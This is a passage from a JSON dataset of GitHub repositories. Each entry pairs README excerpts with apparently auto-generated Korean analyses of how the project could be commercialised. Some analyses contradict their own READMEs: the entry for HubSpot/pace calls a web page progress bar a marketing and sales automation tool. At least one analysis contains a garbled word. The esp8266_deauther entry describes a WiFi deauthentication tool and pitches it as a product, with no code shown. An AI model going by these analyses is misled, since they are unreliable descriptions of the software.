TOC目录\r\n\r\n2016.12.04\r\n1. 打赏\r\n2. 搜索\r\n3. “更好的”标签云\r\n4. “更好的”分享\r\n5. 一些动画\r\n\r\n**计划中：**\r\n\r\n1. 移动端优化\r\n             \r\n## 一、外观\r\n\r\n####**常规**\r\n\r\n![常规](https://cloud.githubusercontent.com/assets/2024949/19027861/92879edc-8967-11e6-8e60-7987b6507c8d.gif)\r\n\r\n####**手机**\r\n\r\n![手机](https://cloud.githubusercontent.com/assets/2024949/19027020/1c5b756a-895f-11e6-99bf-ddff9687aee0.gif)   \r\n\r\n####**ipad横竖屏切换**\r\n\r\n![ipad横竖屏切换](https://cloud.githubusercontent.com/assets/2024949/19026392/e74e1816-89","composite_score":0.376,"license_safety_tag":"unknown"},{"name":"ruanyf/simple-bash-scripts","github_url":"https://github.com/ruanyf/simple-bash-scripts","stars":5,"language":"Shell","license":"unknown","abandonment_months":17,"description":"# ruanyf/simple-bash-scripts 분석\n\n## 왜 보물인가\n리눅스/맥에서 반복적인 작업을 자동화하는 실용적인 코드 모음으로, 비개발자도 복사-붙여넣기로 업무 효율을 2-3배 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **내부 업무 도구 SaaS**: 기업의 서버 관리자나 IT팀을 위한 자동화 작업 플랫폼으로 제공\n2. **API","readme_excerpt":"A collection of simple Bash scripts.\n\n## Getting Started\n\n1. [Hello.sh](scripts/hello-world.sh): get a simple output\n1. [Process.sh](scripts/process.sh): execute more than one command in a script\n1. [Interactive.sh](scripts/interactive.sh): a simple but very much interactive script\n1. [Special-Pattern.sh](scripts/special-pattern.sh): draw a diamond pattern with dots(.)\n1. [While-Read.sh](scripts/while-read.sh): read lines from a file using while loop\n1. [Read-Menu.sh](scripts/read-menu.sh): display a menu for system information\n1. [While-Menu.sh](scripts/while-menu.sh): a repeated menu for system information\n1. [Affect.sh](scripts/affect.sh): print a spinner loader\n1. [Colorful.sh](scripts/color.sh): provide you with the output of several colours\n1. [Convertlowercase.sh](scripts/convertlowercase.sh): convert data either from the file or standard input to lowercase\n1. [up.sh](scripts/up.sh): move up a directory in shell script\n1. [List-dir.sh](scripts/list-dir.sh): list files in a direc","composite_score":0.3759,"license_safety_tag":"unknown"},{"name":"chowa/ejyy","github_url":"https://github.com/chowa/ejyy","stars":23,"language":"TypeScript","license":"AGPL-3.0","abandonment_months":11,"description":"# chowa/ejyy 프로젝트 분석\n\n## 왜 보물인가\n아파트나 건물 같은 공동주택의 관리 업무를 자동화하는 오픈소스 플랫폼으로, 관리사무소의 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **아파트 관리 SaaS**: 월세/관리비 청구, 입주자 공지사항 전송, 시설 예약 관리 등을 디지털화한 구독 서비스\n2. **건물주 내부 도구","readme_excerpt":"## 项目介绍\n\n「e家宜业」是一套基于AGPL v3开源协议开源的智慧物业解决方案。实现了微信公众号、小程序、PC、H5、智能硬件多端打通。 后端采用Koa + Typescript轻量级构建，支持分布式部署；前端使用vue + view-design开发。\n\n> 禁止将本项目的代码和资源进行任何形式的出售和盈利，产生的一切后果由侵权者自负！！\n\n## 产品展示\n\n### web中台\n\n![web1](resources/images/web1.png)\n![web3](resources/images/web3.jpg)\n![web4](resources/images/web4.jpg)\n![web6](resources/images/web6.jpg)\n![web8](resources/images/web8.jpg)\n![web9](resources/images/web9.jpg)\n![web11](resources/images/web11.jpg)\n\n### 业主端小程序\n\n<p align=\"center\" >\n<img src=\"resources/images/owner1.jpg\" width=\"320\"/>\n<img src=\"resources/images/owner2.jpg\" width=\"320\"/>\n<img src=\"resources/images/owner3.jpg\" width=\"320\"/>\n<img src=\"resources/images/owner5.jpg\" width=\"320\"/>\n<img src=\"resources/images/owner6.jpg\" width=\"320\"/>\n<img src=\"resources/images/owner7.jpg\" width=\"320\"/>\n</p>\n\n### 员工端小程序\n\n<p align=\"center\" >\n<img src=\"resources/images/pc1.jpg\" width=\"320\"/>\n<img src=\"resources/images/pc3.jpg\" width=\"320\"/>\n<img src=\"resources/images/pc4.jpg\" width=\"320\"/>\n<img src=\"resource","composite_score":0.3759,"license_safety_tag":"risky"},{"name":"zulip/zulip-mobile","github_url":"https://github.com/zulip/zulip-mobile","stars":13,"language":"JavaScript","license":"Apache-2.0","abandonment_months":12,"description":"# Zulip Mobile 저장소 분석\n\n## 왜 보물인가\n팀 소통을 위한 무료 메신저 앱의 모바일 버전으로, 비용 부담 없이 안전한 내부 커뮤니케이션 시스템을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 내부 메신저 SaaS**\n대기업과 중소기업이 Slack 같은 고가 도구 대신 무료로 팀 협업 플랫폼을 도입하고, 모바일 앱으로 언제 ","readme_excerpt":"# Zulip Mobile\n\n[![CI](https://github.com/zulip/zulip-mobile/actions/workflows/ci.yml/badge.svg)](https://github.com/zulip/zulip-mobile/actions/workflows/ci.yml?query=branch%3Amain)\n[![Zulip chat](https://img.shields.io/badge/zulip-join_chat-brightgreen.svg)](https://chat.zulip.org/#narrow/stream/mobile)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/zulip/zulip-mobile/blob/main/CONTRIBUTING.md)\n\nZulip Mobile is the official mobile Zulip client, supporting both iOS\nand Android.\n\n\n## Get the app\n\nRelease versions of the app are available here:\n* [Zulip for iOS](https://itunes.apple.com/app/zulip/id1203036395)\n  on the iTunes App Store\n* [Zulip for Android](https://play.google.com/store/apps/details?id=com.zulipmobile)\n  on the Google Play Store\n  * Or if you don't use Google Play, you can [download an\n    APK](https://github.com/zulip/zulip-mobile/releases/latest)\n    from the official build we post on GitHub, or get the app\n    [on F-Droid","composite_score":0.3759,"license_safety_tag":"safe"},{"name":"archriss/react-native-snap-carousel","github_url":"https://github.com/archriss/react-native-snap-carousel","stars":5,"language":"JavaScript","license":"bsd-3-clause","abandonment_months":23,"description":"# react-native-snap-carousel 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 사진이나 상품을 좌우로 넘기는 슬라이드 기능을 간단하게 만들어주는 도구로, 많은 앱 개발자들이 필요로 하는 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 전자상거래 앱 SaaS**\n- 쇠핫 상품 추천 슬라이드 기능을 제공하는 구독형 서비스로, 소규모","readme_excerpt":"# react-native-snap-carousel\n\n![platforms](https://img.shields.io/badge/platforms-Android%20%7C%20iOS-brightgreen.svg?style=flat-square&colorB=191A17)\n[![npm](https://img.shields.io/npm/v/react-native-snap-carousel.svg?style=flat-square)](https://www.npmjs.com/package/react-native-snap-carousel)\n[![npm](https://img.shields.io/npm/dm/react-native-snap-carousel.svg?style=flat-square&colorB=007ec6)](https://www.npmjs.com/package/react-native-snap-carousel)\n<!-- [![github release](https://img.shields.io/github/release/meliorence/react-native-snap-carousel.svg?style=flat-square)](https://github.com/meliorence/react-native-snap-carousel/releases) -->\n[![github issues](https://img.shields.io/github/issues/meliorence/react-native-snap-carousel.svg?style=flat-square)](https://github.com/meliorence/react-native-snap-carousel/issues)\n[![github closed issues](https://img.shields.io/github/issues-closed/meliorence/react-native-snap-carousel.svg?style=flat-square&colorB=44cc11)](https://github.com/m","composite_score":0.3758,"license_safety_tag":"safe"},{"name":"ronggang/transmission-web-control","github_url":"https://github.com/ronggang/transmission-web-control","stars":5,"language":"CSS","license":"MIT","abandonment_months":12,"description":"# Transmission Web Control 상용화 분석\n\n## 왜 보물인가\n파일 다운로드를 자동으로 관리해주는 프로그램의 사용자 인터페이스를 웹 기반으로 만든 것으로, 기술자가 아닌 일반인도 쉽게 다운로드를 제어할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 개인용 클라우드 저장소 관리 도구**\n일반인이 자신의 서버에서 대용량","readme_excerpt":"## 注意：项目不再维护\n> 因项目时间久远，所涉及的技术已过于陈旧，加上本人已没有精力在本项目上进行更新，现决定归档本项目，大家可以使用其他替代项目。\n>\n> 如您还需要继续使用本项目，目前最好的方式是在 Docker 里使用 2.94 版本，然后设定环境变量指定WebUI，具体可参考（https://www.cnblogs.com/ronggang/p/18788723 ）；或者使用其他已集成的项目。\n>\n> 感谢大家长期以来的支持。\n> \n> 2025.06.01 栽培者 \n\n----\n\n<p align=\"center\">\n<img src=\"https://github.com/ronggang/transmission-web-control/raw/master/src/tr-web-control/logo.png\"><br/>\n<a href=\"https://github.com/ronggang/transmission-web-control/releases\" title=\"GitHub Releases\"><img src=\"https://img.shields.io/github/release/ronggang/transmission-web-control.svg\"></a>\n<img src=\"https://img.shields.io/badge/transmission-%3E=2.40%20(RPC%20%3E14)-green.svg\" title=\"Support Transmission Version\">\n<a href=\"https://github.com/ronggang/transmission-web-control/LICENSE\" title=\"GitHub license\"><img src=\"https://img.shields.io/github/license/ronggang/transmission-web-control.svg\"></a>\n<a href=\"https://t.me/transmission_web_control\"><img src=\"https://img.shields.io/badge/Telegram-Chat-blue.svg?logo=telegra","composite_score":0.3757,"license_safety_tag":"safe"},{"name":"JustWayward/BookReader","github_url":"https://github.com/JustWayward/BookReader","stars":10,"language":"Java","license":"apache-2.0","abandonment_months":38,"description":"# BookReader 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 전자책을 읽을 수 있는 무료 앱으로, 책 출판사나 도서관이 디지털 서비스를 직접 운영할 수 있는 기반을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **도서관 디지털 서비스**: 지자체 도서관이 자체 전자책 앱을 만들어 주민들에게 무료 제공\n2. **출판사 직판 플랫폼**: 출판사가 중간 ","readme_excerpt":"\n\n项目地址：[https://github.com/JustWayward/BookReader](https://github.com/JustWayward/BookReader)\n\n# BookReader\n#### \"任阅\" 网络小说阅读器，实现追书推荐收藏、书籍/标签检索、模拟翻书的翻页效果、缓存书籍、日夜间模式、本地txt/pdf/epub书籍阅读、字体/主题/亮度设置、Wifi传书等功能！\n\n**此项目停止维护，由于当时做的比较粗糙，分页、翻页、性能这些都做的相当不好，在 言士创作 中，对这方面做了很多的优化，不过没有开源。 有相关问题欢迎发我邮箱交流！**\n**另外，追书神器api也被废弃了，所以接口都请求失败了。可直接参考阅读部分的源代码**\n\n## 项目\n项目基于RxJava + Retrofit2 + Dagger2，项目中的API均来自追书神器，纯属共享学习之用，不得用于商业！！有任何疑问或建议可联系[smuyyh@gmail.com](mailto://smuyyh@gmail.com)。\n\ndemo下载：[任阅.apk](https://github.com/JustWayward/BookReader/raw/master/体验demo/任阅-20170129.apk)\n\n**android 本地网络小说爬虫项目：** [CrawlerForReader](https://github.com/smuyyh/CrawlerForReader)\n\nRN版本：[simplereader](https://github.com/jsntjinjin/simplereader)\n\n任阅改进版：[NovelReader](https://github.com/newbiechen1024/NovelReader)\n\n## 截图\n\n- **首页**\n\n<img src=\"https://github.com/JustWayward/BookReader/blob/master/screenshot/home_zhuishu.png?raw=true\" width=\"250\"/> <img src=\"https://github.com/JustWayward/BookReader/blob/master/screenshot/home_commu","composite_score":0.3757,"license_safety_tag":"safe"},{"name":"hongyangAndroid/AndroidAutoLayout","github_url":"https://github.com/hongyangAndroid/AndroidAutoLayout","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":91,"description":"# AndroidAutoLayout 프로젝트 분석\n\n## 왜 보물인가\n스마트폰 화면 크기가 다양해도 앱이 자동으로 화면에 맞춰 표시되는 기술로, 앱 개발자의 번거로운 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발사의 내부 업무 도구**: 개발자가 여러 화면 크기에 맞출 때 자동 조정 도구를 제공하는 서비스\n2. **앱 개발 플","readme_excerpt":"# AndroidAutoLayout\n[DEPRECATED]Android屏幕适配方案，直接填写设计图上的像素尺寸即可完成适配。\n\n>目前没有精力，已停止维护，使用前务必看明白代码，明确该方案可以解决自身问题，有扩展代码能力，否则不建议使用。\n\n非常感谢 ： 吃土豆的人 的协作。\n\n\n>推荐使用[AndroidAutoSize](https://github.com/JessYanCoding/AndroidAutoSize)\n\nAndroidAutoSize目前作者一直在维护，私下也有一些交流，也是 AndroidAutoLayout 3年的使用者，自研了[AndroidAutoSize](https://github.com/JessYanCoding/AndroidAutoSize), 在目前本库已经没有精力维护的情况下，推荐使用；如果使用了本库，迁移成本也非常低,[迁移指南](https://github.com/JessYanCoding/AndroidAutoSize/issues/90)。\n\n\n\n## 效果图\n\n最大幅度解决适配问题，并且最大化方便开发者。\n\n\n\nso,看下用法：\n\n<img src=\"autolayout_08.png\"/>\n\n\n<img src=\"autolayout_09.png\"/>\n\n你没有看错，拿到设计稿，在布局文件里面直接填写对应的px即可，px:这里的px并非是Google不建议使用的px，在内部会进行转化处理。\n\nok，拿一些实际项目的页面，看下不同分辨率下的效果：\n\n左为：768 * 1280 ; 右为：1080 * 1920\n\n<img src=\"preview/preview_01.png\" width=\"800px\"/>\n\n<img src=\"preview/preview_02.png\" width=\"800px\"/>\n\n<img src=\"preview/preview_03.png\" width=\"800px\"/>\n\n\n\n上述两个机器的分辨率差距挺大了，但是完美实现了适配，最为重要的是：\n\n* 再也不用拿着设计稿去想这控件的宽高到底取多少dp\n* 再也不用去为多个屏幕去写多个dimens\n* 再也不用去计算百分比了（如果使用百分比控件完成适配）\n* 再也不用去跟UI MM去解释什么是dp了\n\n你所要做","composite_score":0.3755,"license_safety_tag":"safe"},{"name":"81813780/AVLoadingIndicatorView","github_url":"https://github.com/81813780/AVLoadingIndicatorView","stars":16,"language":"Java","license":"unknown","abandonment_months":38,"description":"# AVLoadingIndicatorView 평가 보고서\n\n## 왜 보물인가\n앱이나 웹사이트에서 데이터를 불러올 때 표시하는 로딩 애니메이션을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발 서비스**: 앱 제작 회사가 고객 앱에 로딩 화면을 빠르게 추가하는 기능으로 판매\n2. **웹사이트 제작 도구**: 중소 비즈니스가","readme_excerpt":"# PLEASE NOTE, THIS PROJECT IS NO LONGER BEING MAINTAINED\n\n* * *\n\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-AVLoadingIndicatorView-green.svg?style=flat)](https://android-arsenal.com/details/1/2686)\n\nAVLoadingIndicatorView\n===================\n\n> **Now AVLoadingIndicatorView was updated version to 2.X , If you have any question or suggestion  with this library , welcome to tell me !**\n\n## Introduction\nAVLoadingIndicatorView is a collection of nice loading animations for Android.\n\nYou can also find iOS version of this [here](https://github.com/ninjaprox/NVActivityIndicatorView).\n\n## Demo\n![avi](screenshots/avi.gif)\n\n## Usage\n\n### Step 1\n\nAdd dependencies in build.gradle.\n```groovy\n    dependencies {\n       compile 'com.wang.avi:library:2.1.3'\n    }\n```\n\n### Step 2\n\nAdd the AVLoadingIndicatorView to your layout:\n\nSimple \n\n```java\n    <com.wang.avi.AVLoadingIndicatorView\n        android:layout_width=\"wrap_content\"  \n        android:layout_height=\"wrap_content\"\n     ","composite_score":0.3754,"license_safety_tag":"unknown"},{"name":"awslabs/aws-serverless-workshops","github_url":"https://github.com/awslabs/aws-serverless-workshops","stars":6,"language":"JavaScript","license":"apache-2.0","abandonment_months":22,"description":"# AWS 서버리스 워크숍 저장소 분석\n\n## 왜 보물인가\nAWS에서 공식 제공하는 서버리스 기술 교육 자료로, 클라우드 비용을 획기적으로 줄일 수 있는 현대적 개발 방식을 배울 수 있기 때문입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 채팅/알림 기능이 필요한 웹 애플리케이션의 백엔드 구축\n2. **내부 업무 도구**: 직원 휴가 신청","readme_excerpt":"*These workshops have been deprecated. For current serverless workshops, please visit: https://serverlessland.com/learn?type=Workshops*\n\n---\n\n# Wild Rydes Serverless Workshops\n\nThis repository contains a collection of workshops and other hands on content that will guide you through building various serverless applications using AWS Lambda, Amazon API Gateway, Amazon DynamoDB, AWS Step Functions, Amazon Kinesis, and other services.\n\n# Workshops\n\n- [**Web Application**](https://webapp.serverlessworkshops.io) - This workshop shows you how to build a dynamic, serverless web application. You'll learn how to host static web resources with Amazon S3, how to use Amazon Cognito to manage users and authentication, and how to build a RESTful API for backend processing using Amazon API Gateway, AWS Lambda and Amazon DynamoDB.\n\n- [**Auth**](https://auth.serverlessworkshops.io) - This workshop shows you how to build in security at multiple layers of your application, starting with sign-up and sign-i","composite_score":0.3752,"license_safety_tag":"safe"},{"name":"ethereum/mist","github_url":"https://github.com/ethereum/mist","stars":17,"language":"JavaScript","license":"gpl-3.0","abandonment_months":71,"description":"# Ethereum Mist 저장소 분석\n\n## 왜 보물인가\n블록체인 초기 시대에 만들어진 이더리움 공식 지갑으로, 암호화폐 자산 관리와 스마트 계약 실행을 한 번에 할 수 있는 역사적 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 블록체인 초보자를 위한 교육용 암호화폐 지갑 플랫폼으로 재개발\n- **내부 업무 도구**: 기업의 ","readme_excerpt":"# Mist Browser [Deprecated]\n\n[![Github All Releases](https://img.shields.io/github/downloads/ethereum/mist/total.svg)](http://www.somsubhra.com/github-release-stats/?username=ethereum&repository=mist)\n[![Build Status develop branch](https://travis-ci.org/ethereum/mist.svg?branch=develop)](https://travis-ci.org/ethereum/mist)\n[![Build status](https://ci.appveyor.com/api/projects/status/bcfm3v0y2ovq9xob?svg=true)](https://ci.appveyor.com/project/ethereum/mist)\n[![Join the chat at https://gitter.im/ethereum/mist](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/ethereum/mist)\n[![Code Triagers Badge](https://www.codetriage.com/ethereum/mist/badges/users.svg)](https://www.codetriage.com/ethereum/mist)\n\n>__Mist and Ethereum Wallet have been deprecated.__ See the [announcement](https://medium.com/@avsa/sunsetting-mist-da21c8e943d2) and view the [migration guide](https://medium.com/@omgwtfmarc/mist-migration-patterns-6bcf066ac383).\n\nThe Mist browser is the tool of choice to browse ","composite_score":0.3752,"license_safety_tag":"restricted"},{"name":"hangtwenty/dive-into-machine-learning","github_url":"https://github.com/hangtwenty/dive-into-machine-learning","stars":5,"language":"","license":"CC-BY-4.0","abandonment_months":48,"description":"# Dive into Machine Learning 상용화 분석\n\n## 왜 보물인가\n머신러닝을 처음 배우는 사람들을 위한 체계적인 학습 가이드로, 수백만 명의 AI 관심층이 필요로 하는 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 초보자 대상 머신러닝 강좌 판매 (월 $9.99~$29.99)\n2. **기업 인재 개발 서비","readme_excerpt":"* **[SupportUkraineNow.org — \"Real ways you can help Ukraine\"](https://supportukrainenow.org)**\n\n----\n\n### Initiatives\n\nBefore we [dive in](#dive-into-machine-learning), here are some notable projects and initiatives that might interest you as well.\n\n#### Related to machine learning\n\n* [AlgorithmWatch](https://algorithmwatch.org/en/) — [newsletter](https://algorithmwatch.org/en/newsletter/) — \"a non-profit research and advocacy organization that is committed to watch, unpack and analyze automated decision-making (ADM) systems and their impact on society.\"\n* [`daviddao/awful-ai`](https://github.com/daviddao/awful-ai) — \"Awful AI is a curated list to track current scary usages of AI — hoping to raise awareness\"\n* [`humanetech-community/awesome-humane-tech`](https://github.com/humanetech-community/awesome-humane-tech) — \"Promoting solutions that improve wellbeing, freedom and society\"\n\n#### Code against climate change\n\n* [`ProjectDrawdown/solutions`](https://github.com/ProjectDrawdown/sol","composite_score":0.3752,"license_safety_tag":"unknown"},{"name":"desandro/masonry","github_url":"https://github.com/desandro/masonry","stars":7,"language":"HTML","license":"unknown","abandonment_months":24,"description":"# Masonry 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 사진이나 상품을 Pinterest처럼 자동으로 예쁘게 배치해주는 기술로, 온라인 쇼핑몰과 포트폴리오 사이트의 필수 기능입니다.\n\n## 어디에 쓸 수 있나\n- **전자상거래 SaaS**: 중소 쇼핑몰 운영자가 상품 목록을 자동으로 정렬하는 기능 제공\n- **포트폴리오 웹빌더**: 프리랜서와 디자이","readme_excerpt":"# Masonry\n\n_Cascading grid layout library_\n\nMasonry works by placing elements in optimal position based on available vertical space, sort of like a mason fitting stones in a wall. You’ve probably seen it in use all over the Internet.\n\nSee [masonry.desandro.com](https://masonry.desandro.com) for complete docs and demos.\n\n## Install\n\n### Download\n\n+ [masonry.pkgd.js](https://unpkg.com/masonry-layout@4/dist/masonry.pkgd.js) un-minified, or\n+ [masonry.pkgd.min.js](https://unpkg.com/masonry-layout@4/dist/masonry.pkgd.min.js) minified\n\n### CDN\n\nLink directly to Masonry files on [unpkg](https://unpkg.com/).\n\n``` html\n<script src=\"https://unpkg.com/masonry-layout@4/dist/masonry.pkgd.js\"></script>\n<!-- or -->\n<script src=\"https://unpkg.com/masonry-layout@4/dist/masonry.pkgd.min.js\"></script>\n```\n\n### Package managers\n\n[npm](https://www.npmjs.com/package/masonry-layout): `npm install masonry-layout --save`\n\nBower: `bower install masonry-layout --save`\n\n## Support Masonry development\n\nMasonry has","composite_score":0.3751,"license_safety_tag":"unknown"},{"name":"apachecn/awesome-algorithm","github_url":"https://github.com/apachecn/awesome-algorithm","stars":16,"language":"JavaScript","license":"unknown","abandonment_months":24,"description":"# awesome-algorithm 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 문제를 효율적으로 푸는 방법들을 모아놓은 교과서 같은 자료로, 소프트웨어 회사들의 기술 면접 준비와 개발 능력 향상에 직접 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 알고리즘 학습 콘텐츠를 패키징하여 구독형 강의 서비스로 제공\n2.","readme_excerpt":"# ApacheCN 数据结构与算法译文集\n\n> 协议：[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/)\n> \n> 程序员的双手是魔术师的双手，他们把枯燥无味的代码变成了丰富多彩的软件。——《疯狂的程序员》\n\n* [在线阅读](https://algo.apachecn.org)\n* [在线阅读（Gitee）](https://apachecn.gitee.io/apachecn-algo-zh/)\n* [ApacheCN 学习资源](http://docs.apachecn.org/)\n\n## 目录\n\n+   [数据结构思维中文版](docs/think-dast-zh/SUMMARY.md)\n+   [Leetcode C++ 题解](docs/leetcode/cpp/SUMMARY.md)\n+   [Leetcode Java 题解](docs/leetcode/java/SUMMARY.md)\n+   [Leetcode JavaScript 题解](docs/leetcode/javascript/SUMMARY.md)\n+   [Leetcode Python 题解](docs/leetcode/python/SUMMARY.md)\n+   [剑指 Offer Java 题解](docs/jianzhioffer/java/SUMMARY.md)\n\n## 贡献指南\n\n为了不断改进翻译质量，我们特此启动了【翻译、校对、笔记整理活动】，开设了多个校对项目。贡献者校对一章之后可以领取千字2\\~4元的奖励。进行中的校对活动请见[活动列表](https://home.apachecn.org/#/docs/activity/docs-activity)。更多详情请联系飞龙（Q562826179，V:wizardforcel）。\n\n## 联系方式\n\n### 负责人\n\n* [飞龙](https://github.com/wizardforcel): 562826179\n\n### 其他\n\n*   在我们的 [apachecn/apachecn-algo-zh](https://github.com/apachecn/apachecn-algo-zh) github 上提 issue","composite_score":0.3745,"license_safety_tag":"unknown"},{"name":"spacehuhn/esp8266_deauther","github_url":"https://github.com/spacehuhn/esp8266_deauther","stars":6,"language":"C","license":"NOASSERTION","abandonment_months":22,"description":"# esp8266_deauther 프로젝트 분석\n\n## 왜 보물인가\n저가의 와이파이 칩 한 개로 네트워크 신호를 끊는 도구를 만들 수 있어서, 보안 테스트나 네트워크 연구에 필요한 비싼 장비를 대체할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 보안 진단 SaaS**\n기업 IT팀이 자신들의 와이파이 보안을 직접 테스트할 수 있는 클라우드 기반 ","readme_excerpt":"# ESP8266 Deauther\n\n<img src='https://deauther.com/img/logo.png' alt='Deauther Logo' width='200' />\n\n**Scan for WiFi devices, block selected connections, create dozens of networks and confuse WiFi scanners.**\n\n## New Documentation\n\nHi 👋  \nPlease visit [Deauther.com](https://deauther.com) for information about this project.  \nHere are some quick links:\n\n* [Buy](https://deauther.com/docs/buy)\n* [Download](https://deauther.com/docs/download)\n* [DIY Tutorial](https://deauther.com/docs/category/diy-tutorial)\n* [Usage](https://deauther.com/docs/category/usage)\n* [FAQ](https://deauther.com/docs/faq)\n\n## Password\n\nThe password for `pwned` is `deauther`\n\n## About this Project\n\nThis firmware allows you to easily perform a variety of actions to test 802.11 networks using an [ESP8266](https://www.espressif.com/en/products/socs/esp8266). It's also a great project for learning about WiFi, microcontrollers, Arduino, hacking and electronics/programming in general.  \n\nThe deauthentication attack is the","composite_score":0.3743,"license_safety_tag":"unknown"},{"name":"HubSpot/pace","github_url":"https://github.com/HubSpot/pace","stars":5,"language":"CSS","license":"mit","abandonment_months":27,"description":"# HubSpot/pace 분석 보고서\n\n## 왜 보물인가\nHubSpot의 공식 저장소인 만큼 신뢰성 높은 업무 자동화 도구로, 기업들이 반복적인 작업을 효율화하는 데 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 마케팅 팀을 위한 캠페인 자동 스케줄링 및 성과 분석 플랫폼\n2. **내부 업무 도구**: 영업팀의 고객 ","readme_excerpt":"PACE\n====\n[![Latest Release](https://img.shields.io/github/tag/CodeByZach/pace.svg?label=release)](https://github.com/CodeByZach/pace/releases/latest) [![jsDelivr hits (npm)](https://img.shields.io/jsdelivr/npm/hm/pace-js?color=%23ff5627)](https://www.jsdelivr.com/package/npm/pace-js) [![Stars](https://img.shields.io/github/stars/CodeByZach/pace.svg)](https://github.com/CodeByZach/pace/stargazers) [![Forks](https://img.shields.io/github/forks/CodeByZach/pace.svg)](https://github.com/CodeByZach/pace/network/members) [![License](https://img.shields.io/github/license/CodeByZach/pace.svg)](LICENSE)\n\nAn automatic web page progress bar.\n\n### [Demo](https://codebyzach.github.io/pace/)\n### [Documentation](https://codebyzach.github.io/pace/docs/)\n\nInclude [pace.js](https://cdn.jsdelivr.net/npm/pace-js@latest/pace.min.js) and the\n[theme](https://codebyzach.github.io/pace/) css of your choice on your page\n(as early as possible), and you're done!\n\nPace will automatically monitor your ajax requests","composite_score":0.3741,"license_safety_tag":"safe"},{"name":"balancap/SSD-Tensorflow","github_url":"https://github.com/balancap/SSD-Tensorflow","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":58,"description":"# balancap/SSD-Tensorflow 분석 보고서\n\n## 왜 보물인가\n사진 속 물체들을 자동으로 찾아내는 AI 기술로, 보안 카메라, 자동 검사, 위험 감지 등 현실 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **CCTV 모니터링 SaaS**: 편의점/주차장 영상에서 자동으로 이상 행동이나 물체 감지 → 경보 알림 서비스\n2. *","readme_excerpt":"# SSD: Single Shot MultiBox Detector in TensorFlow\n\nSSD is an unified framework for object detection with a single network. It has been originally introduced in this research [article](http://arxiv.org/abs/1512.02325).\n\nThis repository contains a TensorFlow re-implementation of the original [Caffe code](https://github.com/weiliu89/caffe/tree/ssd). At present, it only implements VGG-based SSD networks (with 300 and 512 inputs), but the architecture of the project is modular, and should make easy the implementation and training of other SSD variants (ResNet or Inception based for instance). Present TF checkpoints have been directly converted from SSD Caffe models.\n\nThe organisation is inspired by the TF-Slim models repository containing the implementation of popular architectures (ResNet, Inception and VGG). Hence, it is separated in three main parts:\n* datasets: interface to popular datasets (Pascal VOC, COCO, ...) and scripts to convert the former to TF-Records;\n* networks: definition ","composite_score":0.3739,"license_safety_tag":"unknown"},{"name":"domnikl/DesignPatternsPHP","github_url":"https://github.com/domnikl/DesignPatternsPHP","stars":5,"language":"PHP","license":"mit","abandonment_months":16,"description":"# DesignPatternsPHP 분석 보고서\n\n## 왜 보물인가\n프로그래머들이 복잡한 소프트웨어를 더 쉽게 만들 수 있도록 도와주는 설계 원칙들을 모아둔 실용적인 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발사 교육 플랫폼 (SaaS)**\n- 신입 프로그래머 교육용 온라인 강의 플랫폼으로 패턴 학습 콘텐츠 판매\n\n**2. 기업 내부 개발 ","readme_excerpt":"# DesignPatternsPHP\n\n[![Build Status](https://github.com/DesignPatternsPHP/DesignPatternsPHP/workflows/CI/badge.svg?branch=main)](https://github.com/DesignPatternsPHP/DesignPatternsPHP/actions)\n[![Documentation Status](https://readthedocs.org/projects/designpatternsphp/badge/?version=latest)](https://designpatternsphp.readthedocs.io/?badge=latest)\n\n[Read the Docs of DesignPatternsPHP](http://designpatternsphp.readthedocs.org)\nor [Download as PDF/Epub](https://readthedocs.org/projects/designpatternsphp/downloads/)\n\nThis is a collection of known design patterns and some sample codes on how to implement them in PHP. Every pattern has a small list of examples.\n\nI think the problem with patterns is that often people do know them but don't know when to apply which. Remember that each pattern has its own trade-offs. And you need to pay attention more to why you're choosing a certain pattern than to how to implement it.\n\n## Installation\nYou should look at and run the tests to see what happens ","composite_score":0.3739,"license_safety_tag":"safe"},{"name":"wangfupeng1988/wangEditor","github_url":"https://github.com/wangfupeng1988/wangEditor","stars":5,"language":"TypeScript","license":"mit","abandonment_months":20,"description":"# wangEditor 상용화 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱에서 글을 쓸 때 필요한 글 편집 도구를 직접 만들 필요 없이 바로 가져다 쓸 수 있는 완성된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 블로그 플랫폼, 협업 도구, 콘텐츠 관리 시스템 등이 자체 글쓰기 기능을 구축할 때 사용\n- 개발 시간을 단축하고","readme_excerpt":"# wangEditor 5\n\n[English](./README-en.md)\n\n## 介绍\n\n开源 Web 富文本编辑器，开箱即用，配置简单。支持 JS Vue React 。\n\n- [文档](https://www.wangeditor.com/)\n- [demo](https://www.wangeditor.com/demo/)\n\n![](./docs/images/editor.png)\n\n## 交流\n\n- 